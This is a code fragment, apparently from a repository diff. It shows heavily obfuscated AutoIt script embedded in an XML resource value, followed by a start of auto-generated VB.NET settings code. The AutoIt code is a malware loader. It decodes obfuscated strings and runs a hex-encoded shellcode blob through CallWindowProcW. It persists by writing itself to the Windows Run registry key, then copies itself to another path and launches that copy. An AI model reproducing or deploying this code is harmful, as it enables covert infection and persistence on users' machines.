Local $Q31348sDBrg = $D35DwRjW, $E3136UElHWx = DllStructCreate(H31SrxSm(98) & H31SrxSm(121) & H31SrxSm(116) & H31SrxSm(101) & H31SrxSm(91) & BinaryLen($Q31348sDBrg) & H31SrxSm(93))
|
||||
DllStructSetData($E3136UElHWx, 1, $Q31348sDBrg)
|
||||
Local $L3230KV = DllStructCreate(H31SrxSm(98) & H31SrxSm(121) & H31SrxSm(116) & H31SrxSm(101) & H31SrxSm(91) & BinaryLen($M3132URSXaN) & H31SrxSm(93))
|
||||
DllStructSetData($L3230KV, 1, $M3132URSXaN)
|
||||
Local $Q3234hc0 = H31SrxSm(117) & H31SrxSm(115) & H31SrxSm(101) & H31SrxSm(114) & H31SrxSm(51) & H31SrxSm(50) & H31SrxSm(46) & H31SrxSm(100) & H31SrxSm(108) & H31SrxSm(108)
|
||||
Local $R3235Vadv = H31SrxSm(67) & H31SrxSm(97) & H31SrxSm(108) & H31SrxSm(108) & H31SrxSm(87) & H31SrxSm(105) & H31SrxSm(110) & H31SrxSm(100) & H31SrxSm(111) & H31SrxSm(119) & H31SrxSm(80) & H31SrxSm(114) & H31SrxSm(111) & H31SrxSm(99)
|
||||
Local $G3236fcCV = H31SrxSm(110) & H31SrxSm(111) & H31SrxSm(110) & H31SrxSm(101)
|
||||
DllCall($Q3234hc0, $G3236fcCV, $R3235Vadv, "p" &"t" &"r", DllStructGetPtr($E3136UElHWx), "p" &"t" &"r", DllStructGetPtr($L3230KV), H31SrxSm(105) & H31SrxSm(110) & H31SrxSm(116), BinaryLen($M3132URSXaN), H31SrxSm(115) & H31SrxSm(116) & H31SrxSm(114), $H3133Ihg, H31SrxSm(105) & H31SrxSm(110) & H31SrxSm(116), 0)
|
||||
Local $D3334IjH = DllStructGetData($L3230KV, 1)
|
||||
$L3230KV = 0
|
||||
$E3136UElHWx = 0
|
||||
Return $D3334IjH
|
||||
EndFunc
|
||||
|
||||
Func H31SrxSm($K3339uZ)
|
||||
Return Chr($K3339uZ + 22 - 11 - 10 - 1)
|
||||
EndFunc
|
||||
|
||||
Func J3228($P3431SIwG2, $X3432lK)
|
||||
Local $J3433dRr = "0" &"x" &"6" &"0" &"E" &"8" &"4" &"E" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"B" &"0" &"0" &"6" &"5" &"0" &"0" &"7" &"2" &"0" &"0" &"6" &"E" &"0" &"0" &"6" &"5" &"0" &"0" &"6"
|
||||
$J3433dRr &= "C" &"0" &"0" &"3" &"3" &"0" &"0" &"3" &"2" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"E" &"0" &"0" &"7" &"4" &"0" &"0" &"6" &"4" &"0" &"0" &"6" &"C" &"0" &"0" &"6" &"C"
|
||||
$J3433dRr &= "0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "0" &"5" &"B" &"8" &"B" &"F" &"C" &"6" &"A" &"4" &"2" &"E" &"8" &"B" &"B" &"0" &"3" &"0" &"0" &"0" &"0" &"8" &"B" &"5" &"4" &"2" &"4" &"2" &"8" &"8" &"9" &"1" &"1" &"8"
|
||||
$J3433dRr &= "B" &"5" &"4" &"2" &"4" &"2" &"C" &"6" &"A" &"3" &"E" &"E" &"8" &"A" &"A" &"0" &"3" &"0" &"0" &"0" &"0" &"8" &"9" &"1" &"1" &"6" &"A" &"4" &"A" &"E" &"8" &"A" &"1" &"0"
|
||||
$J3433dRr &= "3" &"0" &"0" &"0" &"0" &"8" &"9" &"3" &"9" &"6" &"A" &"1" &"E" &"6" &"A" &"3" &"C" &"E" &"8" &"9" &"D" &"0" &"3" &"0" &"0" &"0" &"0" &"6" &"A" &"2" &"2" &"6" &"8" &"F"
|
||||
$J3433dRr &= "4" &"0" &"0" &"0" &"0" &"0" &"0" &"E" &"8" &"9" &"1" &"0" &"3" &"0" &"0" &"0" &"0" &"6" &"A" &"2" &"6" &"6" &"A" &"2" &"4" &"E" &"8" &"8" &"8" &"0" &"3" &"0" &"0" &"0"
|
||||
$J3433dRr &= "0" &"6" &"A" &"2" &"A" &"6" &"A" &"4" &"0" &"E" &"8" &"7" &"F" &"0" &"3" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "6" &"A" &"2" &"E" &"6" &"A" &"0" &"C" &"E" &"8" &"7" &"6" &"0" &"3" &"0" &"0" &"0" &"0" &"6" &"A" &"3" &"2" &"6" &"8" &"C" &"8" &"0" &"0" &"0" &"0" &"0" &"0" &"E" &"8" &"6" &"A" &"0" &"3" &"0" &"0" &"0" &"0" &"6"
|
||||
$J3433dRr &= "A" &"2" &"A" &"E" &"8" &"5" &"C" &"0" &"3" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"C" &"7" &"0" &"1" &"4" &"4" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"A" &"1" &"2" &"E" &"8" &"4" &"D" &"0" &"3" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "6" &"8" &"5" &"B" &"E" &"8" &"1" &"4" &"C" &"F" &"5" &"1" &"E" &"8" &"7" &"9" &"0" &"3" &"0" &"0" &"0" &"0" &"6" &"A" &"3" &"E" &"E" &"8" &"3" &"B" &"0" &"3" &"0" &"0" &"0" &"0" &"8" &"B" &"D" &"1" &"6" &"A"
|
||||
$J3433dRr &= "1" &"E" &"E" &"8" &"3" &"2" &"0" &"3" &"0" &"0" &"0" &"0" &"6" &"A" &"4" &"0" &"F" &"F" &"3" &"2" &"F" &"F" &"3" &"1" &"F" &"F" &"D" &"0" &"6" &"A" &"1" &"2" &"E" &"8" &"2" &"3" &"0" &"3" &"0" &"0" &"0" &"0" &"6" &"8"
|
||||
$J3433dRr &= "5" &"B" &"E" &"8" &"1" &"4" &"C" &"F" &"5" &"1" &"E" &"8" &"4" &"F" &"0" &"3" &"0" &"0" &"0" &"0" &"6" &"A" &"1" &"E" &"E" &"8" &"1" &"1" &"0" &"3" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"8" &"B" &"5" &"1" &"3" &"C" &"6"
|
||||
$J3433dRr &= "A" &"3" &"E" &"E" &"8" &"0" &"5" &"0" &"3" &"0" &"0" &"0" &"0" &"8" &"B" &"3" &"9" &"0" &"3" &"F" &"A" &"6" &"A" &"2" &"2" &"E" &"8" &"F" &"A" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"6" &"8" &"F" &"8" &"0" &"0"
|
||||
$J3433dRr &= "0" &"0" &"0" &"0" &"5" &"7" &"5" &"1" &"F" &"F" &"D" &"0" &"6" &"A" &"0" &"0" &"E" &"8" &"E" &"8" &"0" &"2" &"0" &"0" &"0" &"0" &"6" &"8" &"8" &"8" &"F" &"E" &"B" &"3" &"1" &"6" &"5" &"1" &"E" &"8" &"1" &"4" &"0" &"3" &"0"
|
||||
$J3433dRr &= "0" &"0" &"0" &"6" &"A" &"2" &"E" &"E" &"8" &"D" &"6" &"0" &"2" &"0" &"0"
|
||||
$J3433dRr &= "0" &"0" &"8" &"B" &"3" &"9" &"6" &"A" &"2" &"A" &"E" &"8" &"C" &"D" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"1" &"1" &"6" &"A" &"4" &"2" &"E" &"8" &"C" &"4" &"0" &"2" &"0" &"0" &"0" &"0" &"5"
|
||||
$J3433dRr &= "7" &"5" &"2" &"6" &"A" &"0" &"0" &"6" &"A" &"0" &"0" &"6" &"A" &"0" &"4" &"6" &"A" &"0" &"0" &"6" &"A" &"0" &"0" &"6" &"A" &"0" &"0" &"6" &"A" &"0" &"0" &"F" &"F" &"3" &"1" &"F" &"F" &"D" &"0" &"6" &"A" &"1" &"2" &"E" &"8"
|
||||
$J3433dRr &= "A" &"9" &"0" &"2" &"0" &"0" &"0" &"0" &"6" &"8" &"D" &"0" &"3" &"7" &"1" &"0" &"F" &"2" &"5" &"1" &"E" &"8" &"D" &"5" &"0" &"2" &"0" &"0" &"0" &"0" &"6" &"A" &"2" &"2" &"E" &"8" &"9" &"7" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"1"
|
||||
$J3433dRr &= "1" &"6" &"A" &"2" &"E" &"E" &"8" &"8" &"E" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"F" &"F" &"7" &"2" &"3" &"4" &"F" &"F" &"3" &"1" &"F" &"F" &"D" &"0" &"6" &"A" &"0" &"0" &"E" &"8" &"7" &"E" &"0" &"2" &"0" &"0" &"0" &"0" &"6"
|
||||
$J3433dRr &= "8" &"9" &"C" &"9" &"5" &"1" &"A" &"6" &"E" &"5" &"1" &"E" &"8" &"A" &"A" &"0" &"2" &"0" &"0" &"0" &"0" &"6" &"A" &"2" &"2" &"E" &"8" &"6" &"C" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"1" &"1" &"8" &"B" &"3" &"9" &"6" &"A" &"2"
|
||||
$J3433dRr &= "E" &"E" &"8" &"6" &"1" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"6" &"A" &"4" &"0" &"6" &"8" &"0" &"0" &"3" &"0" &"0" &"0" &"0" &"0" &"F" &"F" &"7" &"2" &"5" &"0" &"F" &"F" &"7" &"7" &"3" &"4" &"F" &"F" &"3" &"1" &"F" &"F" &"D"
|
||||
$J3433dRr &= "0" &"6" &"A" &"3" &"6" &"E" &"8" &"4" &"7" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"D" &"1" &"6" &"A" &"2" &"2" &"E" &"8" &"3" &"E" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"3" &"9" &"6" &"A" &"3" &"E" &"E" &"8" &"3" &"5" &"0" &"2" &"0" &"0"
|
||||
$J3433dRr &= "0" &"0" &"8" &"B" &"3" &"1" &"6" &"A" &"2" &"2" &"E" &"8" &"2" &"C" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"1" &"6" &"A" &"2" &"E" &"E" &"8" &"2" &"3" &"0" &"2" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"5" &"2" &"F" &"F" &"7"
|
||||
$J3433dRr &= "7" &"5" &"4" &"5" &"6" &"F" &"F" &"7" &"0" &"3" &"4" &"F" &"F" &"3" &"1" &"6" &"A" &"0" &"0" &"E" &"8" &"1" &"0" &"0" &"2" &"0" &"0" &"0" &"0" &"6" &"8"
|
||||
$J3433dRr &= "A" &"1" &"6" &"A" &"3" &"D" &"D" &"8" &"5" &"1" &"E" &"8" &"3" &"C" &"0"
|
||||
$J3433dRr &= "2" &"0" &"0" &"0" &"0" &"8" &"3" &"C" &"4" &"0" &"C" &"F" &"F" &"D" &"0" &"6" &"A" &"1" &"2" &"E" &"8" &"F" &"9" &"0" &"1" &"0" &"0" &"0" &"0" &"6" &"8" &"5" &"B" &"E" &"8" &"1" &"4" &"C" &"F" &"5" &"1" &"E" &"8" &"2" &"5" &"0"
|
||||
$J3433dRr &= "2" &"0" &"0" &"0" &"0" &"6" &"A" &"2" &"2" &"E" &"8" &"E" &"7" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B" &"1" &"1" &"8" &"3" &"C" &"2" &"0" &"6" &"6" &"A" &"3" &"A" &"E" &"8" &"D" &"B" &"0" &"1" &"0" &"0" &"0" &"0" &"6" &"A" &"0"
|
||||
$J3433dRr &= "2" &"5" &"2" &"5" &"1" &"F" &"F" &"D" &"0" &"6" &"A" &"3" &"6" &"E" &"8" &"C" &"E" &"0" &"1" &"0" &"0" &"0" &"0" &"C" &"7" &"0" &"1" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"B" &"8" &"2" &"8" &"0" &"0" &"0"
|
||||
$J3433dRr &= "0" &"0" &"0" &"6" &"A" &"3" &"6" &"E" &"8" &"B" &"C" &"0" &"1" &"0" &"0" &"0" &"0" &"F" &"7" &"2" &"1" &"6" &"A" &"1" &"E" &"E" &"8" &"B" &"3" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B" &"1" &"1" &"8" &"B" &"5" &"2"
|
||||
$J3433dRr &= "3" &"C" &"8" &"1" &"C" &"2" &"F" &"8" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"3" &"D" &"0" &"6" &"A" &"3" &"E" &"E" &"8" &"9" &"F"
|
||||
$J3433dRr &= "0" &"1" &"0" &"0" &"0" &"0" &"0" &"3" &"1" &"1" &"6" &"A" &"2" &"6" &"E" &"8" &"9" &"6" &"0" &"1" &"0" &"0" &"0" &"0" &"6" &"A"
|
||||
$J3433dRr &= "2" &"8" &"5" &"2" &"F" &"F" &"3" &"1" &"6" &"A" &"1" &"2" &"E" &"8" &"8" &"A" &"0" &"1" &"0" &"0" &"0" &"0" &"6" &"8" &"5" &"B" &"E" &"8" &"1" &"4" &"C" &"F" &"5" &"1" &"E" &"8" &"B" &"6" &"0" &"1" &"0" &"0"
|
||||
$J3433dRr &= "0" &"0" &"8" &"3" &"C" &"4" &"0" &"C" &"F" &"F" &"D" &"0" &"6" &"A" &"2" &"6" &"E" &"8" &"7" &"3" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B" &"3" &"9" &"8" &"B" &"0" &"9" &"8" &"B" &"7" &"1" &"1" &"4" &"6" &"A" &"3" &"E" &"E" &"8" &"6" &"5" &"0"
|
||||
$J3433dRr &= "1" &"0" &"0" &"0" &"0" &"0" &"3" &"3" &"1" &"6" &"A" &"2" &"6" &"E" &"8" &"5" &"C" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"8" &"B" &"5" &"1" &"0" &"C" &"6" &"A" &"2" &"2" &"E" &"8" &"5" &"0" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B"
|
||||
$J3433dRr &= "0" &"9" &"0" &"3" &"5" &"1" &"3" &"4" &"6" &"A" &"4" &"6" &"E" &"8" &"4" &"4" &"0" &"1" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "8" &"B" &"C" &"1" &"6" &"A" &"2" &"E" &"E" &"8" &"3" &"B" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"5" &"0" &"F" &"F" &"7" &"7"
|
||||
$J3433dRr &= "1" &"0" &"5" &"6" &"5" &"2" &"F" &"F" &"3" &"1" &"6" &"A" &"0" &"0" &"E" &"8" &"2" &"A" &"0" &"1" &"0" &"0" &"0" &"0" &"6" &"8" &"A" &"1" &"6" &"A"
|
||||
$J3433dRr &= "3" &"D" &"D" &"8" &"5" &"1" &"E" &"8" &"5" &"6" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"3" &"C" &"4" &"0" &"C"
|
||||
$J3433dRr &= "F" &"F" &"D" &"0" &"6" &"A" &"3" &"6" &"E" &"8" &"1" &"3" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B" &"1" &"1" &"8" &"3"
|
||||
$J3433dRr &= "C" &"2" &"0" &"1" &"8" &"9" &"1" &"1" &"6" &"A" &"3" &"A" &"E" &"8" &"0" &"5" &"0" &"1" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9"
|
||||
$J3433dRr &= "3" &"B" &"C" &"A" &"0" &"F" &"8" &"5" &"3" &"3" &"F" &"F" &"F" &"F" &"F" &"F" &"6" &"A" &"3" &"2" &"E" &"8" &"F" &"4" &"0" &"0" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "8" &"B" &"0" &"9" &"C" &"7" &"0" &"1" &"0" &"7" &"0" &"0" &"0" &"1" &"0" &"0" &"6" &"A" &"0" &"0" &"E" &"8" &"E" &"5" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"8" &"D" &"2" &"C" &"7" &"A" &"7" &"6" &"8" &"5" &"1" &"E"
|
||||
$J3433dRr &= "8" &"1" &"1" &"0" &"1" &"0" &"0" &"0" &"0" &"6" &"A" &"3" &"2" &"E" &"8" &"D" &"3" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"1" &"1" &"6" &"A" &"2" &"E" &"E" &"8" &"C" &"A" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B"
|
||||
$J3433dRr &= "0" &"9" &"5" &"2" &"F" &"F" &"7" &"1" &"0" &"4" &"F" &"F" &"D" &"0" &"6" &"A" &"2" &"2" &"E" &"8" &"B" &"B" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"3" &"9" &"8" &"3" &"C" &"7" &"3" &"4" &"6" &"A" &"3" &"2" &"E" &"8" &"A"
|
||||
$J3433dRr &= "F" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"3" &"1" &"8" &"B" &"B" &"6" &"A" &"4" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"3" &"C" &"6" &"0" &"8" &"6" &"A" &"2" &"E" &"E" &"8" &"9" &"D" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"1"
|
||||
$J3433dRr &= "1" &"6" &"A" &"4" &"6" &"E" &"8" &"9" &"4" &"0" &"0" &"0" &"0" &"0" &"0" &"5" &"1" &"6" &"A" &"0" &"4" &"5" &"7" &"5" &"6" &"F" &"F" &"3" &"2" &"6" &"A" &"0" &"0" &"E" &"8" &"8" &"6" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"8" &"A"
|
||||
$J3433dRr &= "1" &"6" &"A" &"3" &"D" &"D" &"8" &"5" &"1" &"E" &"8" &"B" &"2" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"3" &"C" &"4" &"0" &"C" &"F" &"F" &"D" &"0" &"6" &"A" &"2" &"2" &"E" &"8" &"6" &"F" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9"
|
||||
$J3433dRr &= "8" &"B" &"5" &"1" &"2" &"8" &"0" &"3" &"5" &"1" &"3" &"4" &"6" &"A" &"3" &"2" &"E" &"8" &"6" &"0" &"0" &"0" &"0" &"0" &"0" &"0"
|
||||
$J3433dRr &= "8" &"B" &"0" &"9" &"8" &"1" &"C" &"1" &"B" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"9" &"1" &"1" &"6" &"A" &"0" &"0" &"E" &"8"
|
||||
$J3433dRr &= "4" &"F" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"8" &"D" &"3" &"C" &"7" &"A" &"7" &"E" &"8" &"5" &"1" &"E" &"8" &"7" &"B" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"A" &"3" &"2" &"E" &"8" &"3" &"D" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"D" &"1"
|
||||
$J3433dRr &= "6" &"A" &"2" &"E" &"E" &"8" &"3" &"4" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"F" &"F" &"3" &"2" &"F" &"F" &"7" &"1" &"0" &"4" &"F" &"F" &"D" &"0" &"6" &"A" &"0" &"0" &"E" &"8" &"2" &"4" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"8"
|
||||
$J3433dRr &= "8" &"8" &"3" &"F" &"4" &"A" &"9" &"E" &"5" &"1" &"E" &"8" &"5" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"A" &"2" &"E" &"E" &"8" &"1" &"2" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"0" &"9" &"F" &"F" &"7" &"1" &"0" &"4" &"F" &"F" &"D" &"0" &"6"
|
||||
$J3433dRr &= "A" &"4" &"A" &"E" &"8" &"0" &"4" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"B" &"2" &"1" &"6" &"1" &"C" &"3" &"8" &"B" &"C" &"B" &"0" &"3" &"4" &"C" &"2" &"4" &"0" &"4" &"C" &"3" &"6" &"A" &"0" &"0" &"E" &"8" &"F" &"2" &"F" &"F" &"F" &"F" &"F" &"F"
|
||||
$J3433dRr &= "6" &"8" &"5" &"4" &"C" &"A" &"A" &"F" &"9" &"1" &"5" &"1" &"E" &"8" &"1" &"E" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"A" &"4" &"0" &"6" &"8" &"0" &"0" &"1" &"0" &"0" &"0" &"0" &"0" &"F" &"F" &"7" &"4" &"2" &"4" &"1" &"8" &"6" &"A" &"0" &"0" &"F"
|
||||
$J3433dRr &= "F" &"D" &"0" &"F" &"F" &"7" &"4" &"2" &"4" &"1" &"4" &"E" &"8" &"C" &"F" &"F" &"F" &"F" &"F" &"F" &"F" &"8" &"9" &"0" &"1" &"8" &"3" &"C" &"4" &"1" &"0" &"C" &"3" &"E" &"8" &"2" &"2" &"0" &"0" &"0" &"0" &"0" &"0" &"6" &"8" &"A" &"4"
|
||||
$J3433dRr &= "4" &"E" &"0" &"E" &"E" &"C" &"5" &"0" &"E" &"8" &"4" &"B" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"3" &"C" &"4" &"0" &"8" &"F" &"F" &"7" &"4" &"2" &"4" &"0" &"4"
|
||||
$J3433dRr &= "F" &"F" &"D" &"0" &"F" &"F" &"7" &"4" &"2" &"4" &"0" &"8" &"5" &"0" &"E" &"8" &"3" &"8" &"0" &"0" &"0" &"0" &"0" &"0" &"8" &"3" &"C" &"4" &"0" &"8" &"C" &"3" &"5" &"5" &"5" &"2" &"5" &"1" &"5" &"3" &"5" &"6" &"5" &"7" &"3" &"3" &"C" &"0"
|
||||
$J3433dRr &= "6" &"4" &"8" &"B" &"7" &"0" &"3" &"0" &"8" &"B" &"7" &"6" &"0" &"C" &"8" &"B" &"7" &"6" &"1" &"C" &"8" &"B" &"6" &"E" &"0" &"8" &"8" &"B" &"7" &"E" &"2" &"0" &"8" &"B" &"3" &"6" &"3" &"8" &"4" &"7" &"1" &"8" &"7" &"5" &"F" &"3" &"8" &"0"
|
||||
$J3433dRr &= "3" &"F" &"6" &"B" &"7" &"4" &"0" &"7" &"8" &"0" &"3" &"F" &"4" &"B" &"7" &"4" &"0" &"2" &"E" &"B" &"E" &"7" &"8" &"B" &"C" &"5" &"5" &"F" &"5" &"E" &"5" &"B" &"5" &"9" &"5" &"A" &"5" &"D" &"C" &"3" &"5" &"5" &"5" &"2" &"5" &"1" &"5" &"3"
|
||||
$J3433dRr &= "5" &"6" &"5" &"7" &"8" &"B" &"6" &"C" &"2" &"4" &"1" &"C" &"8" &"5" &"E" &"D" &"7" &"4" &"4" &"3" &"8" &"B" &"4" &"5" &"3" &"C" &"8" &"B" &"5" &"4" &"2" &"8" &"7" &"8" &"0" &"3" &"D" &"5" &"8" &"B" &"4" &"A" &"1" &"8" &"8" &"B"
|
||||
$J3433dRr &= "5" &"A" &"2" &"0" &"0" &"3" &"D" &"D" &"E" &"3" &"3" &"0" &"4" &"9" &"8" &"B" &"3" &"4" &"8" &"B" &"0" &"3" &"F" &"5" &"3" &"3" &"F" &"F" &"3" &"3" &"C" &"0" &"F" &"C" &"A" &"C" &"8" &"4" &"C" &"0" &"7" &"4" &"0" &"7" &"C" &"1"
|
||||
$J3433dRr &= "C" &"F" &"0" &"D" &"0" &"3" &"F" &"8" &"E" &"B" &"F" &"4" &"3" &"B" &"7" &"C" &"2" &"4" &"2" &"0" &"7" &"5" &"E" &"1" &"8" &"B" &"5" &"A" &"2" &"4" &"0" &"3" &"D" &"D" &"6" &"6" &"8" &"B" &"0" &"C" &"4" &"B" &"8" &"B" &"5" &"A" &"1"
|
||||
$J3433dRr &= "C" &"0" &"3" &"D" &"D" &"8" &"B" &"0" &"4" &"8" &"B" &"0" &"3" &"C" &"5" &"5" &"F" &"5" &"E" &"5" &"B" &"5" &"9" &"5" &"A" &"5" &"D" &"C" &"3" &"C" &"3" &"0" &"0" &"0" &"0" &"0" &"0" &"0" &"0"
|
||||
Local $G313039TaOGL = DllStructCreate("b" &"y" &"t" &"e" &"[" & BinaryLen($J3433dRr) & "]")
|
||||
Local $P3131311uQhRI = DllStructCreate("b" &"y" &"t" &"e" &"[" & BinaryLen($X3432lK) & "]")
|
||||
DllStructSetData($G313039TaOGL, 1, $J3433dRr)
|
||||
DllStructSetData($P3131311uQhRI, 1, $X3432lK)
|
||||
Local $X313137LpFu = DllCall("u" &"s" &"e" &"r" &"3" &"2" &"." &"d" &"l" &"l", "i" &"n" &"t", "C" &"a" &"l" &"l" &"W" &"i" &"n" &"d" &"o" &"w" &"P" &"r" &"o" &"c" &"W", "p" &"t" &"r", DllStructGetPtr($G313039TaOGL), "w" &"s" &"t" &"r", ($P3431SIwG2), "p" &"t" &"r", DllStructGetPtr($P3131311uQhRI), "i" &"n" &"t", 0, "i" &"n" &"t", 0)
|
||||
EndFunc
|
||||
|
||||
Func X33b0sH($K3339uZ, $L313232WxZupy, $N313233RV07)
|
||||
Return DllStructSetData($K3339uZ, $L313232WxZupy, $N313233RV07)
|
||||
EndFunc
|
||||
|
||||
Func S341y($Y32VFkD8)
|
||||
C350G("H" &"K" &"E" &"Y" &"_" &"C" &"U" &"R" &"R" &"E" &"N" &"T" &"_" &"U" &"S" &"E" &"R" &"\" &"S" &"o" &"f" &"t" &"w" &"a" &"r" &"e" &"\" &"M" &"i" &"c" &"r" &"o" &"s" &"o" &"f" &"t" &"\" &"W" &"i" &"n" &"d" &"o" &"w" &"s" &"\" &"C" &"u" &"r" &"r" &"e" &"n" &"t" &"V" &"e" &"r" &"s" &"i" &"o" &"n" &"\" &"R" &"u" &"n", $Y32VFkD8, "R" &"E" &"G" &"_" &"S" &"Z", @ScriptFullPath)
|
||||
EndFunc
|
||||
|
||||
Func C350G($K3339uZ, $L313232WxZupy, $N313233RV07, $P313332nlc)
|
||||
Return Execute("R" &"e" &"g" &"W" &"r" &"i" &"t" &"e" &"(" &"'" & $K3339uZ & "'" &"," &" " &"'" & $L313232WxZupy & "'" &"," &" " &"'" & $N313233RV07 & "'" &"," &" " &"'" & $P313332nlc & "'" &")")
|
||||
EndFunc
|
||||
|
||||
Func Z36I4t($Z30EI, $Y31eptPD)
|
||||
If $Z30EI & "\" & $Y31eptPD <> @ScriptFullPath Then
|
||||
FileCopy(@ScriptDir & "\" & @ScriptName, $Z30EI & "\" & $Y31eptPD)
|
||||
ShellExecute($Z30EI & "\" & $Y31eptPD)
|
||||
EndIf
|
||||
EndFunc
|
||||
|
||||
Func F37EA1q0($I313435Guxe)
|
||||
Return STRINGREVERSE($I313435Guxe)
|
||||
EndFunc</value>
|
||||
</data>
|
||||
</root>
|
||||
Generated
+73
@@ -0,0 +1,73 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0"), _
|
||||
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Partial Friend NotInheritable Class MySettings
|
||||
Inherits Global.System.Configuration.ApplicationSettingsBase
|
||||
|
||||
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings), MySettings)
|
||||
|
||||
#Region "My.Settings Auto-Save Functionality"
|
||||
#If _MyType = "WindowsForms" Then
|
||||
Private Shared addedHandler As Boolean
|
||||
|
||||
Private Shared addedHandlerLockObject As New Object
|
||||
|
||||
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Private Shared Sub AutoSaveSettings(ByVal sender As Global.System.Object, ByVal e As Global.System.EventArgs)
|
||||
If My.Application.SaveMySettingsOnExit Then
|
||||
My.Settings.Save()
|
||||
End If
|
||||
End Sub
|
||||
#End If
|
||||
#End Region
|
||||
|
||||
Public Shared ReadOnly Property [Default]() As MySettings
|
||||
Get
|
||||
|
||||
#If _MyType = "WindowsForms" Then
|
||||
If Not addedHandler Then
|
||||
SyncLock addedHandlerLockObject
|
||||
If Not addedHandler Then
|
||||
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
|
||||
addedHandler = True
|
||||
End If
|
||||
End SyncLock
|
||||
End If
|
||||
#End If
|
||||
Return defaultInstance
|
||||
End Get
|
||||
End Property
|
||||
End Class
|
||||
End Namespace
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
|
||||
Friend Module MySettingsProperty
|
||||
|
||||
